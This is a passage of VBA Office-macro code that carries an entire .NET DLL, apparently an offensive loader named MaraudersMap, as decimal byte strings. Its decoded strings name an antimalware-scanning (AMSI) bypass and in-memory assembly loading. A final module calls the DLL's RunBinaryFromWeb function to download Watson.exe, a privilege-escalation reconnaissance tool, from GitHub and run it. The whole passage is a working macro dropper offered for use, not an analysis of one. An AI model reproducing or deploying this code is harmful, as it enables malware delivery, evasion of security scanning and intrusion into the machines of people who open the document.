    dropbin = dropbin + ParseBytes("118 97 114 105 97 110 116 0 73 115 78 117 108 108 79 114 69 109 112 116 121 0 67 111")
    dropbin = dropbin + ParseBytes("110 99 97 116 0 82 101 115 111 108 118 101 69 118 101 110 116 65 114 103 115 0 83")
    dropbin = dropbin + ParseBytes("121 115 116 101 109 46 84 104 114 101 97 100 105 110 103 0 77 111 110 105 116 111")
    dropbin = dropbin + ParseBytes("114 0 69 110 116 101 114 0 67 111 110 116 97 105 110 115 75 101 121 0 69 120 105 116")
    dropbin = dropbin + ParseBytes("0 111 112 95 69 113 117 97 108 105 116 121 0 115 101 116 95 73 116 101 109 0 65 115")
    dropbin = dropbin + ParseBytes("115 101 109 98 108 121 78 97 109 101 70 108 97 103 115 0 103 101 116 95 70 108 97")
    dropbin = dropbin + ParseBytes("103 115 0 73 110 116 101 114 108 111 99 107 101 100 0 69 120 99 104 97 110 103 101")
    dropbin = dropbin + ParseBytes("0 82 101 115 111 108 118 101 69 118 101 110 116 72 97 110 100 108 101 114 0 97 100")
    dropbin = dropbin + ParseBytes("100 95 65 115 115 101 109 98 108 121 82 101 115 111 108 118 101 0 77 97 114 97 117")
    dropbin = dropbin + ParseBytes("100 101 114 115 77 97 112 46 100 108 108 0 109 115 99 111 114 108 105 98 0 65 115")
    dropbin = dropbin + ParseBytes("115 101 109 98 108 121 76 111 97 100 101 114 0 67 111 115 116 117 114 97 0 77 97 114")
    dropbin = dropbin + ParseBytes("97 117 100 101 114 115 77 97 112 0 82 101 102 108 101 99 116 0 85 110 109 97 110 97")
    dropbin = dropbin + ParseBytes("103 101 100 69 120 112 111 114 116 115 0 77 97 114 97 117 100 101 114 115 77 97 112")
    dropbin = dropbin + ParseBytes("95 80 114 111 99 101 115 115 101 100 66 121 70 111 100 121 0 46 99 99 116 111 114")
    dropbin = dropbin + ParseBytes("0 110 117 108 108 67 97 99 104 101 76 111 99 107 0 110 117 108 108 67 97 99 104 101")
    dropbin = dropbin + ParseBytes("0 97 115 115 101 109 98 108 121 78 97 109 101 115 0 115 121 109 98 111 108 78 97 109")
    dropbin = dropbin + ParseBytes("101 115 0 105 115 65 116 116 97 99 104 101 100 0 67 117 108 116 117 114 101 84 111")
    dropbin = dropbin + ParseBytes("83 116 114 105 110 103 0 99 117 108 116 117 114 101 0 82 101 97 100 69 120 105 115")
    dropbin = dropbin + ParseBytes("116 105 110 103 65 115 115 101 109 98 108 121 0 110 97 109 101 0 67 111 112 121 84")
    dropbin = dropbin + ParseBytes("111 0 115 111 117 114 99 101 0 100 101 115 116 105 110 97 116 105 111 110 0 76 111")

    binary2 = dropbin
End Function

Private Function binary3() As String
    Dim dropbin As String

    dropbin = ""
    dropbin = dropbin + ParseBytes("97 100 83 116 114 101 97 109 0 102 117 108 108 78 97 109 101 0 114 101 115 111 117")
    dropbin = dropbin + ParseBytes("114 99 101 78 97 109 101 115 0 82 101 97 100 83 116 114 101 97 109 0 115 116 114 101")
    dropbin = dropbin + ParseBytes("97 109 0 82 101 97 100 70 114 111 109 69 109 98 101 100 100 101 100 82 101 115 111")
    dropbin = dropbin + ParseBytes("117 114 99 101 115 0 114 101 113 117 101 115 116 101 100 65 115 115 101 109 98 108")
    dropbin = dropbin + ParseBytes("121 78 97 109 101 0 82 101 115 111 108 118 101 65 115 115 101 109 98 108 121 0 115")
    dropbin = dropbin + ParseBytes("101 110 100 101 114 0 101 0 65 116 116 97 99 104 0 80 114 105 110 116 66 97 110 110")
    dropbin = dropbin + ParseBytes("101 114 0 102 105 108 101 80 97 116 104 0 78 111 77 111 114 101 84 114 97 99 105 110")
    dropbin = dropbin + ParseBytes("103 70 117 110 99 116 105 111 110 0 98 121 112 97 115 115 65 110 116 105 77 97 108")
    dropbin = dropbin + ParseBytes("119 97 114 101 83 99 97 110 110 105 110 103 73 110 116 101 114 102 97 99 101 70 111")
    dropbin = dropbin + ParseBytes("114 83 104 97 114 112 105 101 115 70 117 110 99 116 105 111 110 0 82 117 110 66 105")
    dropbin = dropbin + ParseBytes("110 97 114 121 70 114 111 109 87 101 98 0 117 114 108 0 111 117 116 102 105 108 101")
    dropbin = dropbin + ParseBytes("0 97 114 103 117 109 101 110 116 115 0 78 111 77 111 114 101 84 114 97 99 105 110")
    dropbin = dropbin + ParseBytes("103 0 98 121 112 97 115 115 65 110 116 105 77 97 108 119 97 114 101 83 99 97 110 110")
    dropbin = dropbin + ParseBytes("105 110 103 73 110 116 101 114 102 97 99 101 70 111 114 83 104 97 114 112 105 101")
    dropbin = dropbin + ParseBytes("115 0 108 111 97 100 65 115 115 101 109 98 108 121 70 114 111 109 69 110 116 114 121")
    dropbin = dropbin + ParseBytes("80 111 105 110 116 0 98 105 110 0 99 111 109 109 97 110 100 115 0 73 83 111 108 101")
    dropbin = dropbin + ParseBytes("109 110 108 121 83 119 101 97 114 73 65 109 85 112 84 111 78 111 71 111 111 100 0")
    dropbin = dropbin + ParseBytes("70 111 100 121 86 101 114 115 105 111 110 0 0 0 133 53 10 0 10 0 32 0 10 0 10 0 10")
    dropbin = dropbin + ParseBytes("0 10 0 10 0 10 0 32 0 32 0 95 0 95 0 32 0 32 0 95 0 95 0 32 0 32 0 32 0 32 0 32 0")
    dropbin = dropbin + ParseBytes("32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32")
    dropbin = dropbin + ParseBytes("0 32 0 32 0 32 0 32 0 32 0 95 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0")
    dropbin = dropbin + ParseBytes("32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32")
    dropbin = dropbin + ParseBytes("0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 10 0 32 0 124 0 32 0")
    dropbin = dropbin + ParseBytes("32 0 92 0 47 0 32 0 32 0 124 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32")
    dropbin = dropbin + ParseBytes("0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 124 0 32 0")
    dropbin = dropbin + ParseBytes("124 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32")
    dropbin = dropbin + ParseBytes("0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0")
    dropbin = dropbin + ParseBytes("32 0 32 0 32 0 32 0 32 0 32 0 10 0 32 0 124 0 32 0 92 0 32 0 32 0 47 0 32 0 124 0")
    dropbin = dropbin + ParseBytes("32 0 95 0 95 0 32 0 95 0 32 0 95 0 32 0 95 0 95 0 32 0 95 0 95 0 32 0 95 0 32 0 95")
    dropbin = dropbin + ParseBytes("0 32 0 32 0 32 0 95 0 32 0 32 0 95 0 95 0 124 0 32 0 124 0 32 0 95 0 95 0 95 0 32")
    dropbin = dropbin + ParseBytes("0 95 0 32 0 95 0 95 0 32 0 95 0 95 0 95 0 32 0 32 0 32 0 95 0 32 0 95 0 95 0 32 0")
    dropbin = dropbin + ParseBytes("95 0 95 0 95 0 32 0 32 0 32 0 95 0 95 0 32 0 95 0 32 0 95 0 32 0 95 0 95 0 32 0 32")
    dropbin = dropbin + ParseBytes("0 10 0 32 0 124 0 32 0 124 0 92 0 47 0 124 0 32 0 124 0 47 0 32 0 95 0 96 0 32 0 124")
    dropbin = dropbin + ParseBytes("0 32 0 39 0 95 0 95 0 47 0 32 0 95 0 96 0 32 0 124 0 32 0 124 0 32 0 124 0 32 0 124")
    dropbin = dropbin + ParseBytes("0 47 0 32 0 95 0 96 0 32 0 124 0 47 0 32 0 95 0 32 0 92 0 32 0 39 0 95 0 95 0 47 0")
    dropbin = dropbin + ParseBytes("32 0 95 0 95 0 124 0 32 0 124 0 32 0 39 0 95 0 32 0 96 0 32 0 95 0 32 0 92 0 32 0")
    dropbin = dropbin + ParseBytes("47 0 32 0 95 0 96 0 32 0 124 0 32 0 39 0 95 0 32 0 92 0 32 0 10 0 32 0 124 0 32 0")
    dropbin = dropbin + ParseBytes("124 0 32 0 32 0 124 0 32 0 124 0 32 0 40 0 95 0 124 0 32 0 124 0 32 0 124 0 32 0 124")
    dropbin = dropbin + ParseBytes("0 32 0 40 0 95 0 124 0 32 0 124 0 32 0 124 0 95 0 124 0 32 0 124 0 32 0 40 0 95 0")
    dropbin = dropbin + ParseBytes("124 0 32 0 124 0 32 0 32 0 95 0 95 0 47 0 32 0 124 0 32 0 32 0 92 0 95 0 95 0 32 0")
    dropbin = dropbin + ParseBytes("92 0 32 0 124 0 32 0 124 0 32 0 124 0 32 0 124 0 32 0 124 0 32 0 124 0 32 0 40 0 95")
    dropbin = dropbin + ParseBytes("0 124 0 32 0 124 0 32 0 124 0 95 0 41 0 32 0 124 0 10 0 32 0 124 0 95 0 124 0 32 0")
    dropbin = dropbin + ParseBytes("32 0 124 0 95 0 124 0 92 0 95 0 95 0 44 0 95 0 124 0 95 0 124 0 32 0 32 0 92 0 95")
    dropbin = dropbin + ParseBytes("0 95 0 44 0 95 0 124 0 92 0 95 0 95 0 44 0 95 0 124 0 92 0 95 0 95 0 44 0 95 0 124")
    dropbin = dropbin + ParseBytes("0 92 0 95 0 95 0 95 0 124 0 95 0 124 0 32 0 32 0 124 0 95 0 95 0 95 0 47 0 32 0 124")
    dropbin = dropbin + ParseBytes("0 95 0 124 0 32 0 124 0 95 0 124 0 32 0 124 0 95 0 124 0 92 0 95 0 95 0 44 0 95 0")
    dropbin = dropbin + ParseBytes("124 0 32 0 46 0 95 0 95 0 47 0 32 0 10 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32")
    dropbin = dropbin + ParseBytes("0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0")
    dropbin = dropbin + ParseBytes("32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32")
    dropbin = dropbin + ParseBytes("0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0")
    dropbin = dropbin + ParseBytes("32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 124 0 32 0 124 0 32 0 32 0 32 0")
    dropbin = dropbin + ParseBytes("32 0 10 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32")
    dropbin = dropbin + ParseBytes("0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0")
    dropbin = dropbin + ParseBytes("32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32")
    dropbin = dropbin + ParseBytes("0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0 32 0")
    dropbin = dropbin + ParseBytes("32 0 32 0 32 0 32 0 124 0 95 0 124 0 10 0 45 0 32 0 73 0 32 0 115 0 111 0 108 0 101")
    dropbin = dropbin + ParseBytes("0 109 0 110 0 108 0 121 0 32 0 115 0 119 0 101 0 97 0 114 0 32 0 73 0 32 0 97 0 109")
    dropbin = dropbin + ParseBytes("0 32 0 117 0 112 0 32 0 116 0 111 0 32 0 110 0 111 0 32 0 103 0 111 0 111 0 100 0")
    dropbin = dropbin + ParseBytes("10 0 10 0 32 0 32 0 98 0 121 0 32 0 106 0 102 0 109 0 97 0 101 0 115 0 10 0 10 0 10")
    dropbin = dropbin + ParseBytes("0 1 35 98 0 114 0 105 0 110 0 103 0 32 0 121 0 111 0 117 0 114 0 32 0 111 0 119 0")
    dropbin = dropbin + ParseBytes("110 0 32 0 58 0 41 0 0 1 0 23 46 0 99 0 111 0 109 0 112 0 114 0 101 0 115 0 115 0")
    dropbin = dropbin + ParseBytes("101 0 100 0 0 3 46 0 0 0 0 230 144 13 114 169 154 246 68 157 254 125 35 110 34 235")
    dropbin = dropbin + ParseBytes("235 0 4 32 1 1 8 3 32 0 1 4 32 1 1 14 4 32 1 1 2 5 32 1 1 17 65 5 0 2 1 14 14 5 0")
    dropbin = dropbin + ParseBytes("1 1 17 89 5 32 1 29 5 14 6 32 1 29 14 29 3 5 32 1 1 18 109 5 0 1 1 18 117 4 0 0 18")
    dropbin = dropbin + ParseBytes("121 4 32 0 29 5 5 32 1 14 29 5 3 32 0 14 7 0 1 18 128 129 29 5 5 32 0 18 128 133 6")
    dropbin = dropbin + ParseBytes("32 2 28 28 29 28 9 0 2 2 18 128 133 18 128 133 4 32 1 28 14 5 0 0 18 128 161 6 32")
    dropbin = dropbin + ParseBytes("0 29 18 128 129 5 32 0 18 128 157 8 0 3 2 14 14 17 128 165 5 32 0 18 128 153 7 32")
    dropbin = dropbin + ParseBytes("3 1 29 5 8 8 7 32 3 8 29 5 8 8 5 0 0 18 128 129 4 32 1 2 14 5 32 1 18 109 14 8 32")
    dropbin = dropbin + ParseBytes("2 1 18 109 17 128 177 4 32 1 1 10 7 21 18 128 149 2 14 14 8 32 2 2 19 0 16 19 1 3")
    dropbin = dropbin + ParseBytes("32 0 10 4 0 1 2 14 6 0 3 14 14 14 14 9 0 2 18 128 129 29 5 29 5 6 0 2 1 28 16 2 7")
    dropbin = dropbin + ParseBytes("21 18 128 149 2 14 2 5 32 1 2 19 0 4 0 1 1 28 9 0 2 2 18 128 129 18 128 129 7 32 2")
    dropbin = dropbin + ParseBytes("1 19 0 19 1 5 32 0 17 128 193 8 0 1 18 128 129 18 128 157 6 0 2 8 16 8 8 5 32 2 1")
    dropbin = dropbin + ParseBytes("28 24 6 32 1 1 18 128 201 8 183 122 92 86 25 52 224 137 4 1 0 0 0 5 1 0 1 0 0 8 1")
    dropbin = dropbin + ParseBytes("0 2 0 0 0 0 0 3 0 0 1 2 6 28 8 6 21 18 128 149 2 14 2 8 6 21 18 128 149 2 14 14 2")
    dropbin = dropbin + ParseBytes("6 8 6 0 1 14 18 128 153 7 0 2 1 18 109 18 109 5 0 1 18 109 14 12 0 2 18 109 21 18")
    dropbin = dropbin + ParseBytes("128 149 2 14 14 14 6 0 1 29 5 18 109 22 0 3 18 128 129 21 18 128 149 2 14 14 21 18")
    dropbin = dropbin + ParseBytes("128 149 2 14 14 18 128 157 9 0 2 18 128 129 28 18 128 185 4 0 1 1 14 8 32 5 1 14 14")
    dropbin = dropbin + ParseBytes("14 2 2 1 1 7 0 2 28 29 5 29 28 5 0 0 32 125 28 1 26 2 6 14 14 54 0 46 0 53 0 46 0")
    dropbin = dropbin + ParseBytes("49 0 46 0 48 0 14 52 0 46 0 49 0 46 0 48 0 46 0 48 0 8 1 0 8 0 0 0 0 0 30 1 0 1 0")
    dropbin = dropbin + ParseBytes("84 2 22 87 114 97 112 78 111 110 69 120 99 101 112 116 105 111 110 84 104 114 111")
    dropbin = dropbin + ParseBytes("119 115 1 17 1 0 12 77 97 114 97 117 100 101 114 115 77 97 112 0 0 5 1 0 0 0 0 23")
    dropbin = dropbin + ParseBytes("1 0 18 67 111 112 121 114 105 103 104 116 32 194 169 32 32 50 48 50 49 0 0 41 1 0")
    dropbin = dropbin + ParseBytes("36 56 51 51 49 57 52 102 50 45 56 99 99 55 45 52 57 101 101 45 97 48 53 101 45 56")
    dropbin = dropbin + ParseBytes("102 52 48 50 102 53 49 48 97 53 56 0 0 12 1 0 7 49 46 48 46 48 46 48 0 0 73 1 0 26")
    dropbin = dropbin + ParseBytes("46 78 69 84 70 114 97 109 101 119 111 114 107 44 86 101 114 115 105 111 110 61 118")
    dropbin = dropbin + ParseBytes("52 46 53 1 0 84 14 20 70 114 97 109 101 119 111 114 107 68 105 115 112 108 97 121")
    dropbin = dropbin + ParseBytes("78 97 109 101 18 46 78 69 84 32 70 114 97 109 101 119 111 114 107 32 52 46 53 13 7")
    dropbin = dropbin + ParseBytes("4 29 18 128 129 8 18 128 129 18 128 157 5 7 2 29 5 8 14 7 5 18 128 129 18 109 18 128")
    dropbin = dropbin + ParseBytes("173 18 77 18 109 3 7 1 14 4 7 1 29 5 14 7 6 14 29 5 18 109 18 128 129 18 109 29 5")
    dropbin = dropbin + ParseBytes("13 7 5 18 128 157 18 128 129 28 2 18 128 129 13 7 6 29 5 29 28 18 77 14 29 28 18 81")
    dropbin = dropbin + ParseBytes("10 7 4 18 128 129 28 18 128 133 28 0 0 0 0 0 72 161 0 64 64 0 0 0 0 0 255 224 0 0")
    dropbin = dropbin + ParseBytes("0 64 0 0 1 0 6 0 0 0 0 0 184 61 0 0 0 0 0 0 0 0 0 0 222 61 0 0 0 32 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 208 61 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 95 67 111 114 68 108 108 77 97 105 110 0 109 115 99 111 114 101 101 46 100 108 108")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 72 161 0 32 64 0 0 0 0 0 255 224 0 0 0 0 0 0 19 0 0 6 0 0 0 0 0 0 0 0 164")
    dropbin = dropbin + ParseBytes("88 113 97 0 0 0 0 86 64 0 0 1 0 0 0 1 0 0 0 1 0 0 0 48 64 0 0 52 64 0 0 56 64 0 0")
    dropbin = dropbin + ParseBytes("118 61 0 0 58 64 0 0 0 0 73 83 111 108 101 109 110 108 121 83 119 101 97 114 73 65")
    dropbin = dropbin + ParseBytes("109 85 112 84 111 78 111 71 111 111 100 0 92 77 97 114 97 117 100 101 114 115 77 97")
    dropbin = dropbin + ParseBytes("112 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")

    binary3 = dropbin
End Function

Private Function binary4() As String
    Dim dropbin As String

    dropbin = ""
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 16 0 0 0 24 0 0 128 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 1 0 1 0 0 0 48 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 72 0")
    dropbin = dropbin + ParseBytes("0 0 88 96 0 0 60 3 0 0 0 0 0 0 0 0 0 0 60 3 52 0 0 0 86 0 83 0 95 0 86 0 69 0 82 0")
    dropbin = dropbin + ParseBytes("83 0 73 0 79 0 78 0 95 0 73 0 78 0 70 0 79 0 0 0 0 0 189 4 239 254 0 0 1 0 0 0 1 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 1 0 0 0 0 0 63 0 0 0 0 0 0 0 4 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 68")
    dropbin = dropbin + ParseBytes("0 0 0 1 0 86 0 97 0 114 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 0 0 36")
    dropbin = dropbin + ParseBytes("0 4 0 0 0 84 0 114 0 97 0 110 0 115 0 108 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 176 4 156 2 0 0 1 0 83 0 116 0 114 0 105 0 110 0 103 0 70 0 105 0 108 0 101 0 73")
    dropbin = dropbin + ParseBytes("0 110 0 102 0 111 0 0 0 120 2 0 0 1 0 48 0 48 0 48 0 48 0 48 0 52 0 98 0 48 0 0 0")
    dropbin = dropbin + ParseBytes("26 0 1 0 1 0 67 0 111 0 109 0 109 0 101 0 110 0 116 0 115 0 0 0 0 0 0 0 34 0 1 0 1")
    dropbin = dropbin + ParseBytes("0 67 0 111 0 109 0 112 0 97 0 110 0 121 0 78 0 97 0 109 0 101 0 0 0 0 0 0 0 0 0 66")
    dropbin = dropbin + ParseBytes("0 13 0 1 0 70 0 105 0 108 0 101 0 68 0 101 0 115 0 99 0 114 0 105 0 112 0 116 0 105")
    dropbin = dropbin + ParseBytes("0 111 0 110 0 0 0 0 0 77 0 97 0 114 0 97 0 117 0 100 0 101 0 114 0 115 0 77 0 97 0")
    dropbin = dropbin + ParseBytes("112 0 0 0 0 0 48 0 8 0 1 0 70 0 105 0 108 0 101 0 86 0 101 0 114 0 115 0 105 0 111")
    dropbin = dropbin + ParseBytes("0 110 0 0 0 0 0 49 0 46 0 48 0 46 0 48 0 46 0 48 0 0 0 66 0 17 0 1 0 73 0 110 0 116")
    dropbin = dropbin + ParseBytes("0 101 0 114 0 110 0 97 0 108 0 78 0 97 0 109 0 101 0 0 0 77 0 97 0 114 0 97 0 117")
    dropbin = dropbin + ParseBytes("0 100 0 101 0 114 0 115 0 77 0 97 0 112 0 46 0 100 0 108 0 108 0 0 0 0 0 72 0 18 0")
    dropbin = dropbin + ParseBytes("1 0 76 0 101 0 103 0 97 0 108 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116")
    dropbin = dropbin + ParseBytes("0 0 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 32 0 169 0 32 0 32 0 50")
    dropbin = dropbin + ParseBytes("0 48 0 50 0 49 0 0 0 42 0 1 0 1 0 76 0 101 0 103 0 97 0 108 0 84 0 114 0 97 0 100")
    dropbin = dropbin + ParseBytes("0 101 0 109 0 97 0 114 0 107 0 115 0 0 0 0 0 0 0 0 0 74 0 17 0 1 0 79 0 114 0 105")
    dropbin = dropbin + ParseBytes("0 103 0 105 0 110 0 97 0 108 0 70 0 105 0 108 0 101 0 110 0 97 0 109 0 101 0 0 0 77")
    dropbin = dropbin + ParseBytes("0 97 0 114 0 97 0 117 0 100 0 101 0 114 0 115 0 77 0 97 0 112 0 46 0 100 0 108 0 108")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 58 0 13 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 78 0 97 0 109 0 101")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 77 0 97 0 114 0 97 0 117 0 100 0 101 0 114 0 115 0 77 0 97 0 112 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 52 0 8 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 86 0 101 0 114 0 115 0 105")
    dropbin = dropbin + ParseBytes("0 111 0 110 0 0 0 49 0 46 0 48 0 46 0 48 0 46 0 48 0 0 0 56 0 8 0 1 0 65 0 115 0 115")
    dropbin = dropbin + ParseBytes("0 101 0 109 0 98 0 108 0 121 0 32 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 49")
    dropbin = dropbin + ParseBytes("0 46 0 48 0 46 0 48 0 46 0 48 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 48 0 0 12 0 0 0 120 173 240 173 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")
    dropbin = dropbin + ParseBytes("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0")

    binary4 = dropbin
End Function

Private Function binary() As String
    Dim dropbin As String

    dropbin = ""
    dropbin = dropbin + binary1()
    dropbin = dropbin + binary2()
    dropbin = dropbin + binary3()
    dropbin = dropbin + binary4()

    binary = dropbin
End Function


' Seccond Module - Import the function and load a remote CSharp file into memory:

Private Declare PtrSafe Function ISolemnlySwearIAmUpToNoGood Lib "ComDLL.dll" () As Object

Sub test()
Dim MM As Object
Dim run

Set MM = ISolemnlySwearIAmUpToNoGood()
run = MM.RunBinaryFromWeb("https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.5_Any/Watson.exe?raw=true", "c:\temp\watsonexcel.txt", "", False, False)
End Sub



